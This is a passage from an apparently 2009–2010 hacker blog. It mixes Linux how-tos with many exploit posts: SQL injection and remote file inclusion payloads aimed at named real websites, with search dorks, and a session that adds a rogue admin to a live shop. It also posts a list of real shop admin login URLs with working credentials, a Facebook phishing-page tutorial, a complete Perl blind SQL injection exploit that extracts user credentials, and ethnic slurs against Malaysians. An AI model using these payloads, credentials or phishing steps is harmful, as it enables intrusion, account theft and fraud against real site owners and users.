URL above means we write "Simple SQLi Dumper" into ssdp.txt that locate at /tmp directory.
to see if it works or no lets read /tmp/ssdp.txt using load_file function. don't forget to convert it first.

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

and you will see result like this.

1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

that the word we write in /tmp/ssdp.txt.
what can we do with create file vuln? we can make a php file as backdoor at the target if we know the directory path. :))

[0x07] brute MySQL v4

guessing table & column for MySQL v4.
you can add your own table name & column name by editing file called tables.dict & columns.dict.

# perl ssdp.pl -u [c0li URL] -brute

[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sun Mar 21 19:31:42 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33
[+] SQLi End Tag: --
Finding Tables & Columns ...

[1] admin_user: username,password,email,adminid,adminname,phone,

Done.

found table "admin_user"
found column "username" "password" "email" "adminid" "adminname" "phone"

[0x08] conclusion

by using SSDp, it's very easy to find SQL injection vulnerability at certain vulnerable parameter or string.
this tool also perform SQL injection test to the vulnerable website and try to dump data from MySQL database.
you can dump data from MySQL database columns and it works nicely.
you can gather secret and confidential data such as usernames, passwords, credit card numbers and etc.
but, i suggest using this tool in a right way. okey dude?? :p

[0x09] references

perl ssdp.pl -h
http://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

[0x10] greetz ^^

Vrs-hCk OoN_Boy paman zxvf angel stardustmemory
s4va xr00tb0y S3T4N pizzyroot matthews martfella

[MH] MainHack BrotherHood - [SiD] ServerIsDown UnderGrounD - AntiSecurity.org Team

osDate RFI Vuln

2010-03-14T13:15:00.002+07:00


[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor   : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/


[o] Vulnerable file
include_once($config['forum_installed'] . "_forum.php");
forum/adminLogin.php
forum/userLogin.php


[o] Exploit
http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]


[o] Dork
"powered by osdate"

Pre E-Learning Portal SQL Injection Vuln

2010-03-04T17:18:00.011+07:00

[o] Pre E-Learning Portal SQL Injection Vulnerability
Software : Pre E-Learning Portal
Vendor : http://www.preproject.com/
Demo : http://www.preprojects.com/elearning/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
search_result.asp [ course_ID ]

[o] Exploit
http://localhost/elearning/search_result.asp?courses=1&course_ID=[SQL]

[o] Proof of Concept
http://www.preprojects.com/elearning/search_result.asp?courses=1&course_ID=194+and+1=0+union+all+select+1,(login%2B':'%2Bpassword%2B':'%2Bemail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+[login]#

u cant see the result?? press ctrl+u and scroll down.. :p

big thanks to Vrs-hCk

XOOPS Module Zen Cart

2010-02-20T13:07:00.005+07:00

this an old bug from BlackH >> http://milw0rm.com/exploits/9005
works for Zen Cart version 1.3.8 but its works on XOOPS Zen Cart module too
lets go.. :p

google dork

"powered by xoops" inurl:"modules/zox"
"powered by xoops" "zen cart"

run the exploit from ur shell

root@evilc0de:/home/noge# ./zen.py -url http://www.a-akinai.com/modules/zox
sql@jah$

now try with show tables; command, if it success then we can exploit the target

sql@jah$ show tables;
>> success ( show tables; )

command execute successfully.. but u cant see the table list right?
lets add admin user to database with this sql command..

sql@jah$ INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87');
>> success ( INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (55, 'giant', 'admin@localhost', '617ec22fbb8f201c366e9848c0eb6925:87'); )

admin added successfully.. now try login to admin panel..

http://www.a-akinai.com/modules/zox/admin/login.php
username : giant
password : wew

Malaysian Zen Cart Sites

2010-02-15T12:12:00.010+07:00

iseng2 nyari web malay sebelum makan siang niy.. wkawkakwakwkak..

login : adminz
pass : wew

ato

login : ganteng
pass : qwerty

http://www.batunisan.com.my/admin/login.php

http://delcom.net.my/shop/admin/login.php

http://mumdreams.com.my/onlinebutik/admin/login.php

http://sandmanguitaronline.com/admin/login.php

http://mixandmatch.com.my/zencart/admin/login.php

http://www.masterschoice.com.my/store/admin/login.php

http://www.aimeily.com.my/shop/admin/login.php

http://www.4allbeauty.com.my/shop2/admin/login.php

http://www.eco-sports.com.my/shop/admin/login.php

http://cyclegarage.com.my/garage/v1.3.8/admin/login.php

http://grays.com.my/shop/admin/login.php

http://shopping.ofitech.com.my/admin/login.php

http://ziodex.com.my/store/admin/login.php

http://ezprint.com.my/admin/login.php

http://www.utamaflorist.com/admin/login.php

http://www.protonsonic.com.my/admin/login.php

http://jackrabbit.com.my/admin/login.php

XMMS packages for Debian and Ubuntu + XMMS Skins

2010-01-13T11:31:00.005+07:00


XMMS is a legacy GTK+1 music player modeled after Winamp.


[o] How to install XMMS

Add the relevant two lines below to /etc/apt/sources.list
open console/terminal and run aptitude update && aptitude install xmms

Debian Lenny 32- and 64-bit x86

deb http://www.pvv.ntnu.no/~knuta/xmms/lenny ./
deb-src http://www.pvv.ntnu.no/~knuta/xmms/lenny ./

Ubuntu Hardy 32- and 64-bit x86

deb http://www.pvv.ntnu.no/~knuta/xmms/hardy ./
deb-src http://www.pvv.ntnu.no/~knuta/xmms/hardy ./

Ubuntu Jaunty 32- and 64-bit x86

deb http://www.pvv.ntnu.no/~knuta/xmms/jaunty ./
deb-src http://www.pvv.ntnu.no/~knuta/xmms/jaunty ./

Ubuntu Karmic 32- and 64-bit x86

deb http://www.pvv.ntnu.no/~knuta/xmms/karmic ./
deb-src http://www.pvv.ntnu.no/~knuta/xmms/karmic ./

To open XMMS player, press ALT+F2 and type XMMS


[o] How to install XMMS skins

You can download skins here http://gnome-look.org
Extract the skin packages and paste it here /usr/share/xmms/Skins
If there is no Skins directory, you have to create it first
To change skin in XMMS just press ALT+S and choose your skin



./NoGe

Hispanic Digital Network Blind SQL Injection Vuln

2010-01-06T19:47:00.004+07:00

[o] Hispanic Digital Network Blind SQL Injection Vulnerability
Software : Hispanic Digital Network
Vendor   : http://www.hdnweb.com/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/

[o] Vulnerable file
news.php

[o] Exploit
http://localhost/[path]/news.php?nid=[Blind SQL]

[o] Proof of Concept
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 = false
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 = true
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 = false
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 = true

[o] Dork
"powered by Hispanic Digital Network"

[o] Notes
fucking private script again and all target are in one IP address. lol

..:: Season Greeting ::..

2009-12-24T12:33:00.004+07:00

M E R R Y C H R I S T M A S

A N D

H A P P Y N E W Y E A R

GOD BLESS YOU ALL

SSH Tunnel with gSTM in ubuntu

2009-12-15T20:20:00.015+07:00

what is gSTM?? [ Gnome SSH Tunnel Manager ]

gSTM is a front-end for managing SSH-tunneled port redirects. It stores tunnel configurations in a simple XML format.
The tunnels (local, remote and dynamic) can be managed and individually started/stopped through one simple interface.

download gSTM

http://sourceforge.net/projects/gstm/
http://kent.dl.sourceforge.net/sourceforge/gstm/gstm_1.2_i386.deb

install gSTM

sudo dpkg -i gstm_1.2_i386.deb


using gSTM

here is my local IP before use gSTM



after installation now go to Applications >> Internet >> gSTM



click Add and change the name with what ever you like



now put your tunnel info into Tunnel configuration



after that click Add on Port redirection
choose dynamic and port is up to you then click OK



now back to the front again and click Start
you will be promt tunnel password, fill the password and click OK



if the light green it means your tunnel is running

now setting the firefox configuration

Edit >> Preferences >> Network >> Settings

choose Manual proxy configuration
go to SOCKS Host and put localhost set the Port with dynamic port that we add in gSTM (12345)
and click OK



this is my IP now



happy browsing!! ^^



greetz to c0li & zxvf
./NoGe

ellistonSPORT Multiple SQL Injection Vuln

2009-12-12T18:34:00.004+07:00

[o] ellistonSPORT Multiple SQL Injection Vulnerability
Software : ellistonSPORT
Vendor   : http://ellistonsport.com/
Demo     : http://demo.ellistonsport.com/index.php
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/
Home     : http://antisecurity.org/

[o] Description
ellistonSPORT is a leading online service providing
professionally designed, easy to update websites for sports clubs and
teams around the world.

[o] Vulnerable file
showPlayer.php
showPage.php
showNews.php

[o] Exploit
http://localhost/[path]/showPlayer.php?id=[SQL]
http://localhost/[path]/showPage.php?id=[SQL]
http://localhost/[path]/showNews.php?id=[SQL]

[o] Proof of Concept
http://garndiffaithrfc.com/showPlayer.php?id=101+AND+1=2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,database()--
http://www.rbscrusaders.com/showPage.php?id=10+AND+1=2+UNION+SELECT+1,version(),database(),4--
http://www.romafc.co.uk/showNews.php?id=363+AND+1=2+UNION+SELECT+1,version(),database(),4,5,6,7--

[o] Dork
"Powered by ellistonSPORT"


[o] Notes
this is a private script and all target are in one IP address.

Eurologon CMS SQL Injection Vuln

2009-12-09T20:02:00.002+07:00

[o] Eurologon CMS SQL Injection Vulnerability
Software : Eurologon Content Management System
Vendor : http://www.content-manager.it/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
links.php

[o] Exploit
http://localhost/[path]/links.php?id=[SQL]

[o] Proof of concept
http://www.ream.it/links.php?id=5+AND+1=2+UNION+SELECT+1,2,3,4,version(),6/*
http://www.fondazionefabretti.it/links.php?id=21+AND+1=2+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14/*

[o] Dork
"Powered by Eurologon"

[o] Notes
this is a private script.

Joomla Components [ com_dm_orders ] SQL Injection Vuln

2009-12-03T23:44:00.002+07:00

[o] com_dm_orders SQL Vulnerability
Software : com_dm_orders [ joomla components ]
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Exploit
http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1

[o] Proof Of Concept
http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54
http://www.bluesplayer.dk/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=56
http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=54

Flash player on Flock [solved]

2009-11-23T09:50:00.003+07:00

hey yoo all.. :))

what the F is Flock?

Flock is a browser. The people here at Flock are committed to building a browser unlike anything you’ve ever experienced before - because we start by focusing on user needs. We take pride in solving for common behaviors on the Web that seem clunky today, and will seem ridiculous tomorrow. We’re taking you there.

taken from http://www.flock.com/about

are you having problem with flash player on Flock browser?
well i do have problem with that shit.
so lets have a look how to solved this problem..
btw, im using Ubuntu and Flock 2.0.3

all you have to do is install flash player first.

$ sudo apt-get install flashplugin-nonfree

if your flash player already installed than you can run this command on terminal

$ sudo ln /usr/lib/flashplugin-nonfree/libflashplayer.so /usr/share/flock/plugins/libflashplayer.so

restart your Flock browser and have a nice day!! ^^

./NoGe

InDonesian SECurity CONFerence 2009 [ idsecconf 2009 ]

2009-10-16T07:37:00.007+07:00




[ Keynote ]

1] Onno W Purbo - (TBA) - Sedang Dalam Konfirmasi
2] Pihak Universitas Al Azhar Indonesia - (TBA)

[ Pembicara ]

1] Dfox - (A Day To ShutDown Indonesian Internet Core Routing)
"Pada presentasi ini akan membahas mengenai celah keamanan Border
Gateway Protocol (BGP) yang banyak dimanfaatkan oleh router ISP di
Indonesia, disertai Demo sederhana menggunakan Dynamips"

2] The hydra - (Bagaimana menulis dan memaintain electronic hacking magazine)
"Presentasi ini akan mengajak kita bersama-sama mengulas lebih jauh
mengenai bagaimana menulis artikel hacking (yang merupakan titik lemah
kita) dan memaintain sebuah majalah elektronik ber-genre hacking"

3] Eadi, k_blacklist_k - (Computer Security Educational Demo for High School Students)
- "Presentasi ini akan memfokuskan dan mendemokan berbagai skenario
yang akan dapat membantu para Siswa SMU untuk dapat mulai mengerti
Bidang mana dari Ilmu komputer yang mereka sukai "

4] Grindstone - (Dasar Dasar Keygenning)
- "Presentasi ini akan mengajak kita untuk lebih memahami proses
pembuatan Key Generator dari suatu aplikasi, pelajaran mendalam
mengenai Software Reverse engineering yang akan mengajak kita membangun
kode yang lebih kuat atau mulai mengalihkan pilihan ke lisensi terbuka
(opensource)"

5] Endy, Yan - (Implementasi Algoritma Stream Cipher Rabbit Pada Protokol Secure Socket Layer (SSL))
- "Presentasi ini menjabarkan mengenai Implementasi algoritma Stream
Cipher Rabbit pada Protocol Secure Socket Layer serta implikasi yang
timbul, serta perbandingan performa dengan berbagai algoritma standard
yang umum di gunakan (RC4, AES, dsb)"

6] Anton - (Selling Pictures in Auction Site ( New Way of South East Asia Scam ))
- "Presentasi ini akan membahas salah satu bentuk kejahatan dunia maya Scamming
yang sedang menjadi tren di Asia Tenggara "

7] MrX - (ADT: It's not about Faking the Approval)
- "Presentasi ini akan menjelaskan mengenai celah-celah dalam
Perbelanjaan Online yang saat ini sudah menjadi tren dan kebiasaan
(disertai berbagai contoh) mengakibatkan peningkatan kejahatan dunia
maya, seperti pencurian identitas, dan kejahatan penggunaan Kartu
kredit akan membuka wawasan kita dalam melindungi diri"

8] BelagaBego - (CROUCHING NETBOOK HIDDEN BACKTRACK: "wireless Man-in-the middle with 3G Touchsreen EEEPC)
- "Sering kali untuk menjadi seorang pentester atau security
profesional, mobilitas dan aktifitas BlackBox sering diperlukan.
Computer yang dibawa haruslah tidak ribet, full compatible software dan
mampu ditweaking. dengan menggunakan netbook EEEPC 701, kita akan
mengubahnya menjadi the most powerfull hacking toys untuk keperluan
pentesting.

[ Diskusi panel ]

1] Seberapa Siapkah Indonesia menghadapi Cyber War
(Komunitas Underground Indonesia)

2] Regenerasi Hacker?
(Komunitas Underground Indonesia)

[ Capture The Flag (CTF) Hacking Contest ]

Permainan Hacking dengan hadiah yang tidak akan dapat anda bayangkan :)

ubuntu GRUB Error 17 [solved]

2009-10-15T00:36:00.005+07:00


yesterday when i turn on my computer and guess what
tadaaa!! i got Error 17 while loading GRUB. wtf is this? lol
i cant login to ubuntu or windoz
so i take the ubuntu installation cd put into CDROM
rebbot and setting BIOS booting via CDROM
after booting from CDROM now you choose
rescue a broken system
then follow the instruction there
then you will be promt an root directory options
choose your root directory
my root directory is /dev/sda6
next step is enter rescue mode
and select reinstall GRUB boot loader
enter your device there
for example my device is (hd0,5)
just type like that then continue and reboot
now my GRUB loader running just fine.. :))

another way to fix the error that i found in internet is

booting from CDROM with your LiveCD
open Terminal
type sudo GRUB
you will be in GRUB mode right now
now type find /boot/GRUB/stage1
that command will show your linux device location such as hd0,5
now type root (hd0,5)
setup (hd0)
quit
reboot



./NoGe

SongBird Browser

2009-10-06T11:27:00.003+07:00


Songbird is a desktop media player mashed-up with the Web.
Songbird is a player and a platform. Like Firefox, Songbird is an open source,
Open Web project built on the Mozilla platform. Songbird provides a
public playground for Web media mash-ups by providing developers with
both desktop and Web APIs, developer resources and fostering Open Web
media standards, to wit, an Open Media Web.

this is my SongBird screenshot




for ubuntu user can install it by type this in console

# apt-get install songbird

for another linux distro and another operating system can download it here

http://www.getsongbird.com/download/

you should try this at home!!
have fun with SongBird.. :))



./NoGe

Dazzle Blast RFI Vuln

2009-10-02T11:59:00.003+07:00


[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/
Home     : http://antisecurity.org/

[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');

admin/includes/createemails.php


[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]

Community Translate RFI Vuln

2009-10-02T11:55:00.001+07:00


[o] Community Translate Remote File Inclusion Vulnerability
Software     : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author       : NoGe
Contact      : noge[dot]code[at]gmail[dot]com
Blog         : http://evilc0de.blogspot.com/
Home         : http://antisecurity.org/

[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");

include/functions.php

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]

Met Lebaraaaaaaaannn... :))

2009-09-20T07:19:00.004+07:00


buat teman2 yang ngerayain idul fitri gw ngucapin


SELAMAT HARI RAYA IDUL FITRI 1430 H
MOHON MAAF HARI BATIN


maafin gw yah kalo ada salah na.. :))



./NoGe

FSphp 0.2.1 Multiple RFI Vuln

2009-09-17T16:27:00.003+07:00


[o] FSphp 0.2.1 Multiple Remote File Inclusion Vulnerability
Software : FSphp version 0.2.1
Vendor   : http://fsphp.sourceforge.net/
Download : http://sourceforge.net/projects/fsphp/
Author   : NoGe
Home     : http://antisecurity.org/

[o] Vulnerable file
include_once $FSPHP_LIB . "/path.php" ;

lib/FSphp.php
lib/navigation.php
lib/pathwirte.php

[o] Exploit
http://localhost/[path]/lib/FSphp.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/navigation.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de]

Regental Medien Blind SQL Injection Vuln

2009-09-16T18:36:00.004+07:00

[o] Regental Medien Blind SQL Injection Vulnerability
Software : Regental Medien
Vendor   : http://www.regental-medien.de/
Author   : NoGe
Home     : http://antisecurity.org

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?mainid=[SQL]

[o] Proof of Concept
http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=4 << TRUE
http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=5 << FALSE
http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=4 << TRUE
http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=5 << FALSE

[o] Dork
"powered by regental medien"

[o] Note
this is a private script
all target are in one IP address

how to make an simple fake login

2009-09-15T00:16:00.010+07:00


in this tutorial i will show you how to make a very simple facebook fake login
this is not a true login just an simple scampage

first u have to make 2 php file
- index.php
- noge.php

open noge.php and put this script



i use image to post the source coz blogspot dont allow it

now open http://www.facebook.com/
view the source or crtl+u copy all source and paste it into index.php
now ctrl+f in index.php and find this >> action=
you will find this line
method="POST" action="https://login.facebook.com/login.php?login_attempt=1"
that is a link to login facebook
change https://login.facebook.com/login.php?login_attempt=1 with noge.php
so that line will like this now
method="POST" action="noge.php"
save it

now upload facebook scampage into your host
this is the example of facebook fake login



fill the email and password for test like pic above then click Login
after it you will be redirect to https://login.facebook.com/login.php?login_attempt=1
now check your email that you put in noge.php

this is the result in your email






email : fake_login@fuckbook.com
password : password

this is for education purpose only
use it at your own risk

IndexScript 3.0 SQL Injection Vuln

2009-09-12T18:46:00.002+07:00


[o] IndexScript 3.0 SQL Injection Vulnerability
Software : IndexScript version 3.0
Vendor   : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author   : NoGe
Home     : http://antisecurity.org

[o] Vulnerable file
more.php

[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]

[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--

[o] Dork
"powered by IndexScript"

PHP Pro Bid Blind SQL Injection Exploit

2009-09-12T08:50:00.004+07:00


#!/usr/bin/perl

#                                                                   
# [o] PHP Pro Bid Blind SQL Injection Exploit                       
#                                                                   
#      Software : Professional Auction Script Software by PHP Pro Bid
#      Vendor   : http://www.phpprobid.com/                         
#      Author   : NoGe                                              
#      Contact  : noge[dot]code[at]gmail[dot]com                    
#      Blog     : http://evilc0de.blogspot.com                       
#      Home     : http://antisecurity.org                            
#                                                                   
# [o] Usage                                                         
#                                                                   
#      root@noge:~# perl bid.txt                                    
#                                                                   
#      [x]=======================================[x]                
#       | PHP Pro Bid Blind SQL Injection Exploit |                 
#       |             [F]ound by NoGe             |                 
#      [x]=======================================[x]                
#                                                                   
#      [+] URL Path : www.target.com                                
#      [+] Valid ID : 100015                                        
#                                                                   
#      [!] Exploiting http://www.target.com/ ...                    
#                                                                   
#      [+] SELECT password FROM probid_admin LIMIT 0,1 ...          
#      [+] result> 3a5e10d2fcd005feefbbb38a24f2c51d                 
#                                                                   
#      [!] Exploit completed.                                       
#                                                                   
#      root@noge:~#                                                 
#                                                                   
# [o] Greetz                                                        
#                                                                   
#      Anti Security [ http://antisecurity.org ]                 
#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe          
#      H312Y yooogy mousekill }^-^{ zxvf martfella noname           
#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke s4va               
#                                                                   
# [o] Note                                                          
#                                                                   
#      FUCK MALAYSIA!!!                                             
#      DON'T YOU HAVE YOUR OWN CULTURE?                             
#      AHH I FORGOT.. YOU DON'T HAVE ANY CULTURE. HAHAHAHA...       
#                                                                   

read more follow link below brotha..

http://antisecurity.org/php-pro-bid-blind-sql-injection-exploit.antisecurity

blogspot not allowed open tags. -_-



./NoGe

Blind SQL Injection Video

2009-09-10T01:24:00.004+07:00


just an simple blind SQL injection video.

download it here dude..

http://pacenoge.org/tool/blind.swf

be safe
./NoGe

TPDugg Joomla Component 1.1 Blind SQL Injection Exploit

2009-09-06T18:18:00.004+07:00

#!/usr/bin/perl

#//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////
#
# [o] TPDugg Joomla Component 1.1 Blind SQL Injection Exploit
#
#      Software : com_tpdugg version 1.1
#      Vendor   : http://www.templateplazza.com/
#      Author   : NoGe
#      Contact  : noge[dot]code[at]gmail[dot]com
#      Blog     : http://evilc0de.blogspot.com - http://pacenoge.org
#
# [o] Usage
#
#      root@noge:~# perl tpdugg.pl
#
#
#      [+] URL Path : www.target.com/[path]
#      [+] Valid ID : 1
#      [+] Column   : username
#
#      [!] Exploiting http://www.target.com/[path]/ ...
#
#      [+] SELECT username FROM jos_users LIMIT 0,1 ...
#      [+] jos_users@username> admin
#
#      [!] Exploit completed.
#
# [o] Simple Joomla Password Cracker
#
#      http://pacenoge.org/joomla/
#
# [o] Greetz
#
#      MainHack BrotherHood [ http://mainhack.net ]
#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe
#      H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
#
#                             --=]> COPY MY STYLE BY SAYKOJI <[=--
#
#      FUCK MALAYSIA!!!
#      DON'T YOU HAVE YOUR OWN CULTURE?
#      AHH I FORGOT.. YOU DON'T HAVE ANY CULTURE. HAHAHAHA...
#
#//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////  
use HTTP::Request;
use LWP::UserAgent;

# table  : jos_users
# column : username and password

$cmsapp = '[-x-]';
$vuln   = 'index.php?option=com_tpdugg&task=tags&id=';
$table  = 'jos_users';
$regexp = 'There are no items';
$maxlen = 65;

my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }

printf "\n
                        $cmsapp
[x]====================================================[x]
|  Joomla Component com_tpdugg BSQL Injection Exploit  |
|          [F]ound by NoGe [C]oded by Vrs-hCk          |
|               www[dot]pacenoge[dot]org               |
[x]====================================================[x]

\n";

print " [+] URL Path : "; chomp($web=);
print " [+] Valid ID : "; chomp($id=);
print " [+] Column   : "; chomp($columns=);

if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";

sub get_data() {
 @columns = split(/,/, $columns);
 foreach $column (@columns) {
  print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
  syswrite(STDOUT, " [+] $table\@$column> ", 255);
  for (my $i=1; $i<=$maxlen; $i++) {    my $chr = 0;    my $found = 0;    my $char = 48;    while (!$chr && $char<=90) {     if(exploit($i,$char) !~ /$regexp/) {      $chr = 1;      $found = 1;      syswrite(STDOUT,chr($char),1);     } else { $found = 0; }     $char++;    }    if(!$chr) {     $char = 97;     while(!$chr && $char<=122) {      if(exploit($i,$char) !~ /$regexp/) {       $chr = 1;       $found = 1;       syswrite(STDOUT,chr($char),1);      } else { $found = 0; }      $char++;     }    }    if (!$found) {     print "\n"; last;    }   }  } }  sub exploit() {  my $limit = $_[0];  my $chars = $_[1];  my $blind = '+AND+ASCII(SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1))='.$chars;  my $inject = $target.$vuln.$id.$blind;  my $content = get_content($inject);  return $content; }  sub get_content() {  my $url = $_[0];  my $req = HTTP::Request->new(GET => $url);
 my $ua  = LWP::UserAgent->new();
 $ua->timeout(5);
 my $res = $ua->request($req);
 if ($res->is_error){
  print "\n\n [!] Error, ".$res->status_line.".\n\n";
  exit;
 }
 return $res->content;
}

how to install Apache, PHP, MySQL and phpMyAdmin on Ubuntu

2009-08-22T17:21:00.016+07:00

[o] Installing Apache

open console and execute this command

$ sudo apt-get install apache2

when its complete you can check if the Apache is working properly by open this address in your browser to "http://localhost".
if you see the text “It works!”, it means your Apache is working good.
in the end of the installation if you see a message like this
“Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName“.
you can fix that by executing the following command.

$ gksu gedit /etc/apache2/conf.d/fqdn

when Gedit opens, type “ServerName localhost” inside the file and click Save then close it.
or your can create fqdn file, edit and copy it into /etc/apache2/conf.d/

[o] Installing php5

execute the following command on your console

$ sudo apt-get install php5 libapache2-mod-php5

after it complete, you have to restart Apache so that php5 will work on Apache.
run this following command in console to restart Apache

$ sudo /etc/init.d/apache2 restart

now you can test to see if php5 works with Apache. To do this you can create a new php file inside your /var/www/ folder.

$ sudo gedit /var/www/phpinfo.php

the command above will open Gedit. Just type in the following php code, save and close the file:

open this in your browser "http://localhost/phpinfo.php"
and if you can see the phpinfo() and information about your php5 installation it means your have successfully installed php5.

[o] Installing MySQL

execute the following command in console

$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql

at the end of the installation you will be prompted to set your root or admin password

set and confirm your root password for mysql

[o] Installing phpMyAdmin

execute the following command in your console

$ sudo apt-get install phpmyadmin

during the installation you will be asked to select the webserver that would be used to run phpMyAdmin. Select Apache2

after the installation is over execute the following command to copy the phpmyadmin folder into the /var/www/ directory.
by default it is installed in /usr/share/phpmyadmin/ directory.

$ sudo ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin

now go to the phpMyAdmin login page by open this in your browser "http://localhost/phpmyadmin/index.php"
the username for MySQL and phpMyAdmin is “root”. the password will be what you set in Installing MySQL.

./NoGe

Ed Charkow's Supercharged Linking Blind SQL Injection Exploit

2009-08-19T14:59:00.004+07:00

#!/usr/bin/perl

#==========================================================================================#
# 
# [o] Ed Charkow's Supercharged Linking Blind SQL Injection Exploit
#      Software   : Ed Charkow's Supercharged Linking
#      Buy Script : http://www.infodepot3000.com/Scripts/content/supercharged_linking.html 
#      Author     : NoGe
#      Contact    : noge[dot]code[at]gmail[dot]com
#      Blog       : http://evilc0de.blogspot.com
#
# [o] Usage
#      root@noge:~# perl link.pl
#
#      [x]============================================================[x]
#       | Ed Charkows Supercharged Linking Blind SQL Injection Exploit |
#       |              [F]ound by NoGe [C]oded by Vrs-hCk              |
#      [x]============================================================[x]
# 
#      [+] URL Path : www.target.com/[path]
#      [+] Valid ID : 1
#
#      [!] Exploiting http://www.target.com/[path]/ ...
#
#      [+] SELECT password FROM admin LIMIT 0,1 ...
#      [+] md5@password> de9e3ae793d300ce7ee4742d4513cb06
#
#      [!] Exploit completed.
#
#      root@noge:~#
#
#      crack the hash and login with username admin
#
